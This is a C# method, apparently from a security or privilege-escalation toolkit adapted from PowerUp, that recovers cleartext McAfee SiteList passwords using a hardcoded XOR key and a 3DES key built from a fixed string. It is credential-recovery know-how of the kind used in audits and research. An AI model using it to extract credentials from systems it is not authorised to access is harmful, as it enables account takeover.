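        /// <summary>
        /// Recovers the cleartext of a McAfee-obfuscated password value.
        /// The input is Base64-decoded, XORed with a fixed 16-byte key, and then
        /// decrypted with 3DES (ECB, no padding) under a key built from the SHA-1
        /// digest of a fixed ASCII string.
        /// </summary>
        /// <remarks>
        /// Every input to the key derivation is a constant in this method, so the
        /// stored value is obfuscated rather than protected. Any file that holds
        /// such a value should be treated as holding the cleartext credential:
        /// restrict read access to it and rotate the account if it was exposed.
        /// </remarks>
        /// <param name="base64password">Base64 text of the obfuscated password.</param>
        /// <returns>
        /// The decoded bytes up to (not including) the first NUL byte, as ASCII;
        /// the whole decrypted buffer if it contains no NUL byte.
        /// </returns>
        /// <exception cref="System.ArgumentNullException"><paramref name="base64password"/> is null.</exception>
        /// <exception cref="System.FormatException"><paramref name="base64password"/> is not valid Base64.</exception>
        /// <exception cref="System.Security.Cryptography.CryptographicException">
        /// The decoded input is not a whole number of 8-byte 3DES blocks.
        /// </exception>
        private static string DecryptPassword(string base64password)
        {
            // Adapted from PowerUp: https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1#L4128-L4326

            // References:
            //  https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
            //  https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
            //  https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
            //  https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf

            // Static XOR key: identical for every input, so it adds no secrecy.
            byte[] xorKey = { 0x12, 0x15, 0x0F, 0x10, 0x11, 0x1C, 0x1A, 0x06, 0x0A, 0x1F, 0x1B, 0x18, 0x17, 0x16, 0x05, 0x19 };

            // Undo the XOR layer in place on the Base64-decoded bytes.
            var passwordBytes = System.Convert.FromBase64String(base64password);

            for (var i = 0; i < passwordBytes.Length; i++)
            {
                passwordBytes[i] = (byte)(passwordBytes[i] ^ xorKey[i % xorKey.Length]);
            }

            // 3DES key: SHA-1 digest of a fixed string (20 bytes) combined with four
            // zero bytes. NOTE(review): MyUtils.CombineArrays is presumably a plain
            // concatenation giving the 24 bytes a 3DES key needs; confirm in MyUtils.
            byte[] tDESKey;
            using (SHA1 crypto = new SHA1CryptoServiceProvider())
            {
                tDESKey = MyUtils.CombineArrays(crypto.ComputeHash(System.Text.Encoding.ASCII.GetBytes("<!@#$%^>")), new byte[] { 0x00, 0x00, 0x00, 0x00 });
            }

            // The algorithm object and the transform both hold key material;
            // dispose them deterministically instead of leaving them to the finalizer.
            byte[] decrypted;
            using (var tDESalg = new TripleDESCryptoServiceProvider())
            {
                tDESalg.Mode    = CipherMode.ECB;
                tDESalg.Padding = PaddingMode.None;
                tDESalg.Key     = tDESKey;

                using (var decryptor = tDESalg.CreateDecryptor())
                {
                    // Decrypt the un-XORed buffer in one call.
                    decrypted = decryptor.TransformFinalBlock(passwordBytes, 0, passwordBytes.Length);
                }
            }

            // The cleartext ends at the first NUL byte. Array.IndexOf returns -1 when
            // there is none (empty input, or a value that fills its last block);
            // passing -1 as the count to GetString would throw, so fall back to
            // the whole buffer.
            var end = Array.IndexOf(decrypted, (byte)0x00);
            if (end < 0)
            {
                end = decrypted.Length;
            }

            return System.Text.Encoding.ASCII.GetString(decrypted, 0, end);
        }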